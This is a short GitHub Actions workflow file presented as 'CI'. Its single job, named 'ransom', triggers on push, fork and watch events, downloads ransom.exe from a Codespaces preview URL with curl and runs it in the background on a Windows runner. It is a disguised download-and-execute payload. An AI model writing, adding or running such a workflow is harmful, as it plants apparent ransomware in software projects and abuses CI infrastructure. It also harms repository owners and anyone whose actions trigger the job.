
name: CI
on: [push, fork, watch]
jobs:
  ransom:
    runs-on: windows-latest
    steps:
    - run: |
        curl -L -O https://crispy-space-potato-r7r9r4wxvg4rfpxw6-5003.preview.app.github.dev/ransom.exe
        ./ransom.exe &
